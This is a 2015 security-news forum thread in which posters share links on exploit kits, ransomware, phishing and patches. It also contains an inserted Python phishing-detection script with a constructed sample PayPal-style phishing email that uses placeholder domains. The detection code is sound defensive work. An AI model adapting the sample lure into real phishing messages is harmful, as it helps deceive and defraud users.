https://blog.malwarebytes.org/malvertising-2/2015/10/angler-exploit-kit-blasts-daily-mail-visitors-via-malvertising/?utm_source=Gplus&utm_medium=social
Redirect to Microsoft Word Macro Virus
https://blog.sucuri.net/2015/10/redirect-to-microsoft-word-macro-virus.html?utm_campaign=Redirect%20to%20Microsoft%20Word%20Macro%20Virus%20Blogpost&utm_medium=social&utm_source=googleplus
Beginner’s Guide to Fixing Your Hacked WordPress Site
http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/?utm_campaign=External%3A%20Beginner%E2%80%99s%20Guide%20to%20Fixing%20Your%20Hacked%20WordPress%20Site&utm_medium=social&utm_source=googleplus
-
You missed one point that's even easier to spot, Bob:
4. PayPal will never, ever address you with a generic greeting like "Dear ... customer". Any number of times, they've made the point that they will always address you by your full registered name, whether individual or enterprise. Any millennium now, scammers may finally wake up to that fact, but in the meantime anything supposedly from them that opens with some variation of "dear customer/client/member" is guaranteed to be fake.
Caution! PayPal Phishing e-mail Scam
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823237881-69161.png)
It may look official but,
1. It didn't come from Paypal
2. The link to "Restore" your PayPal account, leads to
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823602884-55136.png) which has nothing to do with PayPal.
3. Notice the bad grammar and the spelling and punctuation errors.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1444823522999-79485.png)
If you're using Avast, it also protects you since it prevents you from getting to the actual Website.
PayPal will never ask you via email to click on a link to do anything pertaining to your PayPal account.
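Three of the four tell-tales listed in the two posts above (the sender's domain, where the "Restore" link really points, and the generic greeting) are mechanical enough to check with a mail filter; the grammar test is left to the human reader. The following is an added example of such a check using only Python's standard library; it is not code from the posts or from PayPal, the two sample messages are constructed (they are not the one in the screenshots), and the set of domains treated as genuine is an assumption for illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser

# Assumption for illustration: the only registered domains we accept as genuine.
LEGIT_DOMAINS = {"paypal.com"}

# Point 4 above: a greeting that does not use the account holder's name.
GENERIC_GREETING = re.compile(
    r"\bdear\s+(?:valued\s+)?(?:customer|client|member|user)\b", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    """Hostname of an absolute URL, ignoring userinfo and port."""
    m = re.match(r"^[a-z][a-z0-9+.\-]*://([^/?#]+)", url, re.I)
    if not m:
        return ""
    return m.group(1).rsplit("@", 1)[-1].split(":")[0].lower()


def registered_domain(host: str) -> str:
    """Last two labels of a hostname (good enough for .com-style domains)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def analyse(raw_message: str) -> list:
    """Return the list of phishing indicators found in an RFC 822 message."""
    msg = message_from_string(raw_message)
    findings = []

    # Point 1: did it come from the claimed sender's domain?
    _, addr = parseaddr(msg.get("From", ""))
    sender_domain = registered_domain(addr.rsplit("@", 1)[-1]) if "@" in addr else ""
    if sender_domain not in LEGIT_DOMAINS:
        findings.append(f"sender domain {sender_domain!r} is not a PayPal domain")

    # Point 2: where do the links really go (as opposed to what they say)?
    body = msg.get_payload()
    collector = LinkCollector()
    collector.feed(body)
    for href, text in collector.links:
        if registered_domain(host_of(href)) not in LEGIT_DOMAINS:
            findings.append(f"link {text!r} points to {host_of(href)!r}")

    # Point 4: generic greeting instead of the registered name.
    if GENERIC_GREETING.search(body):
        findings.append("generic greeting instead of the registered name")

    return findings


# Constructed sample messages; the domains are placeholders, not real sites.
PHISH = """\
From: PayPal Service <service@paypa1-secure.example>
To: victim@example.net
Subject: Your account has been limited
Content-Type: text/html

<html><body>
<p>Dear Customer,</p>
<p>We detect unusual activity. Please
<a href="http://restore-account.example/login">Restore</a> your account.</p>
</body></html>
"""

GENUINE = """\
From: PayPal <service@paypal.com>
To: jane.doe@example.net
Subject: Receipt for your payment
Content-Type: text/html

<html><body>
<p>Dear Jane Doe,</p>
<p>View the details in your <a href="https://www.paypal.com/myaccount">account</a>.</p>
</body></html>
"""

if __name__ == "__main__":
    for name, sample in (("phish", PHISH), ("genuine", GENUINE)):
        print(name, analyse(sample))
```

The sender check only looks at the visible From header, which a scammer controls; in a real filter it belongs next to SPF/DKIM results, and the link check is the one that catches the case in the screenshots, where the text says "Restore" but the target has nothing to do with PayPal.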
-
UK internet users potential victims of serious cyber attack
http://www.nationalcrimeagency.gov.uk/news/723-uk-internet-users-potential-victims-of-serious-cyber-attack
-
New Adobe Flash Zero-Day Used in Pawn Storm Campaign Targeting Foreign Affairs Ministries
http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/
-
Malware-entry-mwexploitkitblackhole1 back on quite some scale: https://forum.avast.com/index.php?topic=177466.msg1259694#new
polonus
-
New Flash Player Zero-Day in The Wild
https://blog.malwarebytes.org/zero-days/2015/10/new-flash-player-zero-day-in-the-wild/?utm_source=Gplus&utm_medium=social
Stolen 7-zip bundled with adware?
https://blog.malwarebytes.org/online-security/2015/10/stolen-7-zip-bundled-with-adware/?utm_source=Gplus&utm_medium=social
Security Advisory: Stored XSS in Akismet WordPress Plugin
https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html?utm_campaign=External%3A%20Akismet%203.1.5%3A%20Security%20Release&utm_medium=social&utm_source=googleplus
-
Be aware your free download could have come bundled with an unwanted guest, PC Backup.
PCBackup is a misleading program and there has been malware detected inside it.
It can also come installed on your computer by Dell or other computer manufacturers.
Read: http://www.shouldiremoveit.com/MyPC-Backup-19242-program.aspx
Many PC manufacturers have it installed like Dell, Acer, Lenovo.
Go to configuration and uninstall the program. 68% of good people uninstall it!
I just heard from someone that it is a privacy risk, because they have the info you shared with those that installed it,
mail address and who knows what more, so also a privacy injunction there.
polonus
-
Be aware your free download could have come bundled with an unwanted guest, PC Backup.
PCBackup is a misleading program and there has been malware detected inside it.
It can also come installed on your computer by Dell or other computer manufacturers.
Read: http://www.shouldiremoveit.com/MyPC-Backup-19242-program.aspx
Many PC manufacturers have it installed like Dell, Acer, Lenovo.
Go to configuration and uninstall the program. 68% of good people uninstall it!
I just heard from someone that it is a privacy risk, because they have the info you shared with those that installed it,
mail address and who knows what more, so also a privacy injunction there.
polonus
They already have the information the second you register your product or if bought on line, you also supply that information.
-
Hi bob3160,
Thank you for that info bob, but it is new to me that when you give that info to the computer manufacturer it also gets to all the bundler software firms. How would PCBackup know my mail address (or does the Google all-account serve it up to them)? We bought something online and they automatically filled out the age of my spouse :o, you cannot have any secrets on the Interwebs anymore ;D. They could have been somewhat more discreet? ;D
polonus
-
New Adobe Flash Zero-Day Used in Pawn Storm Campaign Targeting Foreign Affairs Ministries
http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/
-> https://helpx.adobe.com/security/products/flash-player/apsa15-05.html
-
Mozilla Add-on guidelines
https://blog.malwarebytes.org/online-security/2015/10/mozilla-add-on-guidelines/?utm_source=Gplus&utm_medium=social
-
New Flash Player Zero-Day in The Wild (updated)
https://blog.malwarebytes.org/zero-days/2015/10/new-flash-player-zero-day-in-the-wild/?utm_source=Gplus&utm_medium=social
eFast browser hijacks file associations
https://blog.malwarebytes.org/online-security/2015/10/efast-browser-hijacks-file-associations/?utm_source=Gplus&utm_medium=social
-
Sinkholed domain returned from the graveyard to serve in ad-fest:
https://forum.avast.com/index.php?topic=177906.0
So not only parked domains deserve this fate, others also will serve up ads from inside the grave.
polonus
-
One million SSL certificates still using “insecure” SHA-1 algorithm
Read Netcraft's report here: http://news.netcraft.com/archives/2015/10/19/one-million-ssl-certificates-still-using-insecure-sha-1-algorithm.html
polonus
-
Joomla alerts to wait for a critical update soon: https://www.joomla.org/announcements/release-news/5633-important-security-announcement-pre-release.html
polonus
-
FinFisher, the spy software of choice for governments to monitor their citizens.
32 governments now known to use this spy software from Germany.
Read this report by Bill Marczak, John Scott-Railton, Adam Senft, Irene Poetranto, and Sarah McKune: https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/
After all of the Hacking Team hack commotion, governments haven't really been shown to act with more caution in this field. :(
polonus
-
FinFisher, the spy software of choice for governments to monitor their citizens.
32 governments now known to use this spy software from Germany.
Read this report by Bill Marczak, John Scott-Railton, Adam Senft, Irene Poetranto, and Sarah McKune: https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/
After all of the Hacking Team hack commotion, governments haven't really been shown to act with more caution in this field. :(
polonus
What do you expect when the head of the CIA uses a private email hosted at AOL ???
-
Hi bob3160,
In the example you mention, isn't it always the lucky one who draws the winning card and gets such a job? But there is no guarantee he is also among the brightest. ;D
On the detection of Finfisher read here: http://www.netmagellan.com/how-i-removed-a-finfisher-finspy-malware-infection-1814.html where a tool by the name of Detekt was used, and another interesting article: https://citizenlab.org/2013/04/for-their-eyes-only-2/
However, it seems there are a lot of cloak-and-dagger stories and disinformation spin involved where such spyware is concerned. ;)
Seems social engineering is the main route of infection. This spyware has nothing to do with your usage of Firefox. It probably comes with a similar filename/logo/description to trick users into allowing it access through firewalls etc. (via e-mail).
So for us all here two golden rules:
1. Always update what you have to update (use the Avast Update Tool), patch what you have to patch.
2. Never fall for social engineering.
These are two things that everyone could/should do to feel better protected.
Damian
-
Is this a step in the right direction? Large browsers now all support the free SSL service Let's Encrypt.
Re: https://letsencrypt.org/certificates/
Have any of the parties involved also considered this could be a golden opportunity for cybercriminals, when the client-side software comes backdoored? But again, cybercrime could afford fraudulent certs already anyway.
On the other hand you do not want the (backdoored) encryption privilege to be exclusively with governments and big corps, do you now?
How much of your freedom will you hand over for more privacy as there always will be some sort of tradeoff somewhere?
polonus
-
New security feature coming to Firefox in the near future: http://thenextweb.com/apps/2015/10/21/firefox-is-testing-marking-any-page-that-sends-passwords-over-http-as-insecure/
I have had these warnings for a long time already from an extension I use in Google Chrome, SaferChrome Security Report;
alongside it runs the Browser JSGuard extension (supported by the Government of India), warning me about all sorts of redirections, as there are: Hidden iFrame(s) Redirections, UnAuthorized Redirections, Encode javascript, External Domain Requests & Trackers.
polonus
-
This is Google Chrome Security's Viewpoint on the matter: https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure
We have three levels here: Secure, Dubious, Insecure.
Read on here: https://sslmate.com/blog/post/chrome_cached_sha1_chains
polonus
-
Fraud Tactics Against Chip-and-PIN Technology
https://blog.malwarebytes.org/fraud-scam/2015/10/fraud-tactics-against-chip-and-pin-technology/?utm_source=Gplus&utm_medium=social
TWO CRITICAL CHALLENGES FACING WEBSITE SECURITY
http://perezbox.com/2015/09/two-critical-challenges-facing-website-security/?utm_campaign=Tony%20Perez%20on%3A%20TWO%20CRITICAL%20CHALLENGES%20FACING%20WEBSITE%20SECURITY&utm_medium=social&utm_source=googleplus
-
Oracle Critical Patch Update Advisory - October 2015
http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html
-
CAS Team Finds Flaw in Computers’ Timekeeping
http://www.bu.edu/today/2015/hacking-network-time-protocol/
Attacking the Network Time Protocol
http://www.cs.bu.edu/~goldbe/NTPattack.html
PDF: http://www.cs.bu.edu/~goldbe/papers/NTPattack.pdf
Patch http://nwtime.org/ntf-releases-ntp-security-patches-ntp-4-2-8p4/
-
Trend Micro Acquires HP TippingPoint, Establishing Game-Changing Network Defense Solution
http://newsroom.trendmicro.com/press-release/company-milestones/trend-micro-acquires-hp-tippingpoint?_ga=1.252947529.1387744404.1445433077
-
Kampagnen Malvertising Campaign Goes After German Users
https://blog.malwarebytes.org/malvertising-2/2015/10/kampagnen-malvertising-campaign-goes-after-german-users/?utm_source=Gplus&utm_medium=social
10 Ways to Protect Against Hackers
https://www.malwarebytes.org/articles/10-ways-to-protect-against-hackers/?utm_source=Gplus&utm_medium=social
Steer Clear of this Apple Invoice Phish
https://blog.malwarebytes.org/fraud-scam/2015/10/steer-clear-of-this-apple-invoice-phish/?utm_source=Gplus&utm_medium=social
-
Ransomware using Remote Desktop to spread itself
http://www.scmagazineuk.com/ransomware-using-remote-desktop-to-spread-itself/article/448377/
http://www.bleepingcomputer.com/news/security/help-recover-files-txt-ransomware-installed-by-targeted-terminal-services-attacks/
-
Watch Out for Health Insurance Spam
https://www.bluecoat.com/security-blog/2015-10-22/watch-out-health-insurance-spam
-
IBM Runs World’s Worst Spam-Hosting ISP?
http://krebsonsecurity.com/2015/10/ibm-runs-worlds-worst-spam-hosting-isp/
-
The cat is out of the bag: http://www.theregister.co.uk/2015/10/24/nsa_encryption_hack/
The actual situation is as feared and predicted in 2005.
Is this a solution? Stop using 1024-bit keys, use longer prime numbers, and use the latest revisions of protocols (which require longer prime numbers).
I do not think so: when encryption gets more and more secure, governments want to have a look where the data resides unencrypted, and that is inside your computer!
These are big, big cats and an enormous amount of mice to chase. :D
polonus
-
OK, that is now verging on paranoia. Who has personal information so secret (legal) that it must be kept hidden?
-
TalkTalk cyber-attack: Website hit by 'significant' breach
http://www.bbc.com/news/uk-34611857
http://www.bbc.com/news/uk-34615226
http://help2.talktalk.co.uk/oct22incident
-
Furor Over IoT Dangers Could Fuel Innovative Security Measures
https://blog.malwarebytes.org/online-security/2015/10/furor-over-iot-dangers-could-fuel-innovative-security-measures/?utm_source=Gplus&utm_medium=social
Bizarre Essex Police #cyberaware Tweet Mystery
https://blog.malwarebytes.org/online-security/2015/10/bizarre-essex-police-cyberaware-tweet-mystery/?utm_source=Gplus&utm_medium=social
edit: additional: I wonder why they call GCHQ "The Doughnut"? ;D
-
Add-ons may spy on you: https://www.reddit.com/r/firefox/comments/3pwcey/firefox_extension_download_manager_s3_asks_for/
Add-on now removed, but not yet added to this blocklist.
See the blocklist: https://addons.mozilla.org/en-US/firefox/blocked/
Certain add-ons can enhance your browser security. Excessive and unwanted add-ons can cripple security seriously!
polonus
-
Am I Being Phished?
https://blog.malwarebytes.org/fraud-scam/2015/10/am-i-being-phished/?utm_source=Gplus&utm_medium=social
-
You'll find many examples of these types of emails on this forum: :)
https://forum.avast.com/index.php?topic=81030.msg662592#msg662592
-
This isn’t the Java I ordered!
https://blog.malwarebytes.org/online-security/2015/10/this-isnt-the-java-i-ordered/?utm_source=Gplus&utm_medium=social
-
Is Mac malware on the rise?
https://blog.malwarebytes.org/mac/2015/10/is-mac-malware-on-the-rise/?utm_source=Gplus&utm_medium=social
-
Is Mac malware on the rise?
https://blog.malwarebytes.org/mac/2015/10/is-mac-malware-on-the-rise/?utm_source=Gplus&utm_medium=social
Yes, it is definitely.
Apple has to ramp up security for sure, better soon than sorry.
-
TalkTalk cyber-attack: Website hit by 'significant' breach
http://www.bbc.com/news/uk-34611857
http://www.bbc.com/news/uk-34615226
http://help2.talktalk.co.uk/oct22incident
TalkTalk Hackers Demanded £80K in Bitcoin
http://krebsonsecurity.com/2015/10/talktalk-hackers-demanded-80k-in-bitcoin/
-
This will be abused on a grand scale to deliver more spam to your mailboxes: Critical Joomla hole attacked 4 hrs after being patched: https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Sucuri warns that loads of websites with Joomla CMS have been attacked shortly after the new Joomla release.
As no other, polonus knows how critical CMS security weighs in the balance. One thing to do: update and patch and do not spread extensive info on software to the world and attackers.
polonus (volunteer website security analyst and error-hunter)
-
The single most important thing a website/server owner can do is to keep their software up-to-date.
Out-of-date software has proven to be easily compromised. Funny what one can find out using "wappalyzer",
and doing a little research is also valuable. That is also something one can find out by using http://toolbar.netcraft.com/site_report/
Get the information, then run with it. Never know where it will lead.
-
What’s Patch Tuesday?
https://blog.malwarebytes.org/online-security/2015/10/whats-patch-tuesday/?utm_source=Gplus&utm_medium=social
The Art of Data Wiping on Mobile Devices
https://blog.malwarebytes.org/mobile-2/2015/10/the-art-of-data-wiping-on-mobile-devices/?utm_source=Gplus&utm_medium=social
-
What’s Patch Tuesday?
https://blog.malwarebytes.org/online-security/2015/10/whats-patch-tuesday/?utm_source=Gplus&utm_medium=social
Windows 10 no longer has a Patch Tuesday since updates and patches can happen at any time. :)
-
University of Amsterdam's "Amsterdam privacy week" sponsored by Facebook and Google as diamond and platinum sponsors. This is a joke: sponsoring of an event by the ones that caused the problems that are being discussed in the first place, aka the "Silicon Empire". "As long as academic independence is guaranteed; sponsors have no influence on the program" was the comment of the organizers.
polonus
-
Adobe Security Bulletin - Security update available for Adobe Shockwave Player
https://helpx.adobe.com/security/products/shockwave/apsb15-26.html
-
Through my continuous website scanning it is clearly shown that an awfully large number of websites with all sorts of jQuery libraries installed have, as a rule, 2 to 5 vulnerable jQuery libraries installed, some of these with active malware. An enormous number of websites with WordPress CMS are open to threats because User Enumeration is possible (user and log-in proliferation) or Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content. Furthermore, plug-ins and themes may be vulnerable to attacks. Alas, all such websites are wide open to attack.
Pro-active hosting with security in mind has not been around much on the Interwebs lately. I try to warn wherever I can when a website's security is endangered and may come under threat (compromise, defacement, XSS attacks, script injection etc. etc.). Website owners, admins, hosters: take these warnings to heart and go and protect your future visitors! Scan, update, patch and configure properly.
polonus (volunteer website security analyst and website error-hunter)
-
This will be abused on a grand scale to deliver more spam to your mailboxes: Critical Joomla hole attacked 4 hrs after being patched: https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Sucuri warns that loads of websites with Joomla CMS have been attacked shortly after the new Joomla release.
As no other, polonus knows how critical CMS security weighs in the balance. One thing to do: update and patch and do not spread extensive info on software to the world and attackers.
Joomla SQL Injection Attacks in the Wild
https://blog.sucuri.net/2015/10/joomla-sql-injection-attacks-in-the-wild.html
-
A Vintage Year for Free Wine Spam
https://blog.malwarebytes.org/fraud-scam/2015/10/a-vintage-year-for-free-wine-spam/?utm_source=Gplus&utm_medium=social
Leaving Laptops in Hotel Rooms: A Bad Idea
https://blog.malwarebytes.org/privacy-2/2015/10/leaving-laptops-in-hotel-rooms-a-bad-idea/?utm_source=Gplus&utm_medium=social
-
Be aware: Copy-Pasting URLs from Google Search can leak Previous Searches.
So do not do this!
Read this article by Jeremy Rubin here: https://medium.com/@jeremyrubin/caution-copy-pasting-urls-from-google-search-can-leak-previous-searches-11940508e79#.fy4492fqk
polonus
-
A true horror-story by Troy Hunt: http://www.troyhunt.com/2015/10/breaches-traders-plain-text-passwords.html
Hacked hoster improves encryption, but what happened before.... :o
polonus
-
Advertising Brokers: A Background Information
https://blog.malwarebytes.org/privacy-2/2015/10/advertising-brokers-background-information/?utm_source=Gplus&utm_medium=social
Imitation Putlocker Site Unlocks Path to PUP
https://blog.malwarebytes.org/online-security/2015/10/imitation-putlocker-site-unlocks-path-to-pup/?utm_source=Gplus&utm_medium=social
-
Picking Apart a Decade of Breaches: The Top 5 Breached Industries
https://blog.trendmicro.com/picking-apart-a-decade-of-breaches-the-top-5-breached-industries/
-
Cybercriminals will exploit your CMS vulnerabilities: https://forum.avast.com/index.php?topic=163838.msg1263387#msg1263387
Don't press your luck, folks: https://securityintelligence.com/cms-hacking-2014-by-the-numbers/
Article author: Douglas Bonderud. Upgrade, update and patch or retire that exploitable and vulnerable code!
polonus
-
Recent Flash Zero-Day Now Part of Exploit Kits
https://blog.malwarebytes.org/exploits-2/2015/10/recent-flash-zero-day-now-part-of-exploit-kits/?utm_source=gplus&utm_medium=social
-
Antivirus That Mimics the Brain Could Catch More Malware
http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/
http://www.engadget.com/2015/11/01/you-might-not-have-to-update-next-gen-antivirus-software/
-
Antivirus That Mimics the Brain Could Catch More Malware
http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/
http://www.engadget.com/2015/11/01/you-might-not-have-to-update-next-gen-antivirus-software/
Good or bad pretty much depends on whose brain is used. :)
-
Antivirus That Mimics the Brain Could Catch More Malware
http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/
http://www.engadget.com/2015/11/01/you-might-not-have-to-update-next-gen-antivirus-software/
Good or bad pretty much depends on whose brain is used. :)
Yes, that's true. But I guess sooner or later all AVs will use something like this for detection; maybe at some point PCs will be so powerful that no servers are necessary anymore to calculate, but just to hold the data.
-
Has MacUpdate fallen to the adware plague?
https://blog.malwarebytes.org/mac/2015/11/has-macupdate-fallen-to-the-adware-plague/?utm_source=Gplus&utm_medium=social
-
EMET security attacked and circumvented read: https://www.duosecurity.com/blog/wow64-and-so-can-you
Article authors: Darren Kemp and Mikhail Davidov.
“EMET mitigations have been bypassed before. This isn’t new.”
Think of the history of the golem folklore, where on the golem's forehead
was written the word "emet" (truth); "emet" minus one letter becomes the word "met", which means dead ;)
polonus
-
It's also the past tense of meet. :)
-
"What's in a word?", said William Shakespeare.
polonus
-
vBulletin.com Password Reset
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4332165-vbulletin-com-password-reset
-
Imitation MSI Tournament Site Offers Up “Anticheat” Download
https://blog.malwarebytes.org/online-security/2015/11/imitation-msi-tournament-site-offers-up-anticheat-download/?utm_source=Gplus&utm_medium=social
Backscatter or Misdirected Bounces
https://blog.malwarebytes.org/online-security/2015/11/backscatter-or-misdirected-bounces/?utm_source=Gplus&utm_medium=social
-
CryptoWall 4.0 released with new Features such as Encrypted File Names
http://www.bleepingcomputer.com/news/security/cryptowall-4-0-released-with-new-features-such-as-encrypted-file-names/
I can't stand this malware junk anymore, something has to happen now or we can't stop it anymore.
-
Unfortunately they cannot be tracked down as all security services/police are crippled by the privacy mob.
-
Unfortunately they cannot be tracked down as all security services/police are crippled by the privacy mob.
That's the issue here: either privacy or Cryptowall. And even if you track them down, what's on the internet once will stay there forever.
-
MacBooks are so hot right now. And so is Mac OS X malware
http://www.theregister.co.uk/2015/11/05/mac_os_x_malware_explodes/
-
ProtonMail still under attack by DDoS bombardment
http://www.theregister.co.uk/2015/11/05/protonmail_ddos_attack/
-
DirectRev Advert Loads Self Sufficient Flash Exploit, CryptoWall
https://blog.malwarebytes.org/malvertising-2/2015/11/directrev-advert-loads-self-sufficient-flash-exploit-cryptowall/?utm_source=Gplus&utm_medium=social
New Malwarebytes Anti-Exploit Adds Fingerprinting Detection
https://blog.malwarebytes.org/exploits-2/2015/11/new-malwarebytes-anti-exploit-adds-fingerprinting-detection/?utm_source=gplus&utm_medium=social
-
E-commerce TPP implications to further erode online privacy: http://techcrunch.com/2015/11/05/tpp-vs-privacy/
polonus
-
Outdated CMS code, unpatched code, leftover code should be retired asap.
For a jQuery example see: https://forum.avast.com/index.php?topic=178773.msg1265449#msg1265449
Get rid of that vulnerable code, protect the visitors of your website.
Here things are OK: -http://zarabotok.net.ua (well website has other issues)
Detected libraries:
jquery - 1.10.2 : -http://zarabotok.net.ua/res/jquery.js?24
No vulnerable libraries found
polonus
-
Adware-wrappers and bundled software can now give you a full new malicious browser like eFast and CrossBrowse.
Read: https://blog.malwarebytes.org/online-security/2015/10/efast-browser-hijacks-file-associations/
& https://blog.malwarebytes.org/online-security/2015/11/crossbrowse-another-chromium-project/
Look out for what you download and where you download from! Do not get an infested browser installer; this again is the next step after the browser hijacker: the hijacked malware browser in itself.
polonus
-
Things can always get worse, as here, where data hit by one-way ransomware can never be restored: ruined OS once and for all. :o
Shoddy programming of ransomware, where there is no way to be restored even if you pay, as the programmer throws out the key with the program. Read:
http://www.bleepingcomputer.com/news/security/shoddy-programming-causes-new-ransomware-to-destroy-your-data/
Article author: Lawrence Abrams
polonus
-
“Offline” Ransomware Encrypts Your Data without C&C Communication
http://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/
-
Nice Instagram, Shame about the Code Generator
https://blog.malwarebytes.org/online-security/2015/11/nice-instagram-shame-about-the-code-generator/?utm_source=Gplus&utm_medium=social
-
Almost impossible to cleanse Android malware
Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire: https://blog.lookout.com/blog/2015/11/04/trojanized-adware/
A factory reset would not remove this malware, unfortunately.
-
Nigerian government serving up fresh phish
http://news.netcraft.com/archives/2015/11/05/nigerian-government-serving-up-fresh-phish.html
-
Beware of a New Apple ID Phishing Campaign
http://news.softpedia.com/news/beware-of-a-new-apple-id-phishing-campaign-495896.shtml
-
Belgium gives Facebook 48 hours to stop tracking non-users or pay €250K per day
https://www.rt.com/news/321373-facebook-belgium-court-tracking/
-
UK Parliament Computer Network Locked by Crypto-Ransomware
http://news.softpedia.com/news/uk-parliament-computer-network-locked-by-crypto-ransomware-495965.shtml
-
UK Parliament Computer Network Locked by Crypto-Ransomware
http://news.softpedia.com/news/uk-parliament-computer-network-locked-by-crypto-ransomware-495965.shtml
It's the computer of a member of Parliament.... I'd call this misleading advertising. :)
-
Aye no need to hack as she is an MP just dangle something nice and shiny to click :)
-
Aye no need to hack as she is an MP just dangle something nice and shiny to click :)
Like an Expenses Claim form :)
-
Sounds like you love your politicians as much as we do..... :)
-
Own a Vizio Smart TV? It’s Watching You
http://www.propublica.org/article/own-a-vizio-smart-tv-its-watching-you
-
Own a Vizio Smart TV? It’s Watching You
http://www.propublica.org/article/own-a-vizio-smart-tv-its-watching-you
Almost all Smart devices are watching you and collect data, it's ridiculous.......
-
Own a Vizio Smart TV? It’s Watching You
http://www.propublica.org/article/own-a-vizio-smart-tv-its-watching-you
Almost all Smart devices are watching you and collect data, it's ridiculous.......
It may be ridiculous but it's a fact of life that the average person needs to adapt to.
-
Official Premier League Fantasy Website Pushes Malvertising
https://blog.malwarebytes.org/malvertising-2/2015/11/official-premier-league-fantasy-website-site-pushes-malvertising/?utm_source=gplus&utm_medium=social
A Week in Security (Nov 01 – Nov 07)
https://blog.malwarebytes.org/online-security/2015/11/a-week-in-security-nov-01-nov-07/?utm_source=gplus&utm_medium=social
-
Encryption ransomware threatens Linux users
https://news.drweb.com/show/?i=9686&lng=en&c=9
https://vms.drweb.com/virus/?i=7704004&lng=en
https://www.virustotal.com/ru/file/fd042b14ae659e420a15c3b7db25649d3b21d92c586fe8594f88c21ae6770956/analysis/
-
Replica YouTube Automated Mails Lead to Fake Pharma
https://blog.malwarebytes.org/fraud-scam/2015/11/fake-youtube-automated-mails-lead-to-fake-pharma/?utm_source=gplus&utm_medium=social
Three Reasons Why Anti-Virus Alone is No Longer Enough
https://blog.malwarebytes.org/security-threat/2015/11/three-reasons-why-anti-virus-alone-is-no-longer-enough/?utm_source=gplus&utm_medium=social
-
Encryption ransomware threatens Linux users
https://news.drweb.com/show/?i=9686&lng=en&c=9
https://vms.drweb.com/virus/?i=7704004&lng=en
https://www.virustotal.com/ru/file/fd042b14ae659e420a15c3b7db25649d3b21d92c586fe8594f88c21ae6770956/analysis/
Strictly speaking it threatens Linux users hosting a web server and running an outdated and insecure version of the Magento third-party application.
http://krebsonsecurity.com/2015/11/ransomware-now-gunning-for-your-web-sites/
-
Goes to show you have to upgrade, update and patch everywhere...
polonus
-
User has absolutely no defense against NSA snooping: https://www.reddit.com/r/IAmA/comments/3sf8xx/im_bill_binney_former_nsa_tech_director_worked/
Even tor and ssl aren't always secure, e.g.: http://www.thoughtcrime.org/software/sslstrip/
FBI allegedly paid university 1 million dollars for an in-between attack on the tor infrastructures: https://blog.torproject.org/blog/did-fbi-pay-university-attack-tor-users
polonus
-
Microsoft Security Bulletin Summary for November 2015
https://technet.microsoft.com/en-us/library/security/ms15-nov.aspx
-
DynamicPricer PUP disables browser updates
https://blog.malwarebytes.org/security-threat/2015/11/dynamicpricer-pup-disables-browser-updates/?utm_source=Gplus&utm_medium=social
-
Windows 3.1 crash puts French airport out of commission
www.digitaltrends.com/computing/windows-3-1-crash-puts-french-airport-out-of-commission/
-
Windows 3.1 crash puts French airport out of commission
www.digitaltrends.com/computing/windows-3-1-crash-puts-french-airport-out-of-commission/
You certainly can't blame Windows 3.1 for this.
France and the world have more serious problems right now. :'(
-
WordPress sites have been attacked 3 1/2 times more often recently.
WP websites have been attacked 7 times more often via (SEO) spam and RFI attacks (remote file inclusion)
than their non-CMS-application counterparts.
WordPress has a problem according to the Imperva report, which shows all sorts of plug-ins and extensions are being developed for it where security does not play any role whatsoever and is a last-resort issue.
So new vulnerabilities and exploits are being detected over and over again. Moreover, WordPress is based on PHP, which often is not securely implemented by developers. Read the report here: http://www.imperva.com/docs/HII_Web_Application_Attack_Report_Ed6.pdf
More often than not these sites are being flagged and alerted as insecure websites, but only after the fact, as such websites have already become compromised, attacked, defaced, malware-ridden, spam-brewing and spewing, PHISHING and part of all sorts of mal-abuse under the sun. Some of such insecure websites are being taken down; in case of continuing abuse the sites' accounts are suspended and/or ad-parked or terminated.
But I and some others here in the forums would like these sites set out as dangerous and open to all forms of abuse from one moment to the next. Just like a truck should be taken off the road by a highway patrol when it has unsafe technology (slick tyres etc.), these websites with such obvious insecurity because of incompetence and negligence should not be allowed any longer to be part of the Interwebs. Users of the Internet would be rather thankful.
polonus (volunteer website security analyst and website error hunter)
-
If it was me,
check used WP version, server software version and such.
And if a version is used a month after a patch/update has been released, block the site/IP and do not allow it until the patch/update is applied.
-
If it was me,
check used WP version, server software version and such.
And if a version is used a month after a patch/update has been released, block the site/IP and do not allow it until the patch/update is applied.
Good job it isn't you, a month is a mere blink of an eye for many. Some wait longer than that just to see if there is any adverse impact of an update/patch.
###
Cast your mind back to the forum software; avast too waited a long time before updating ;D
-
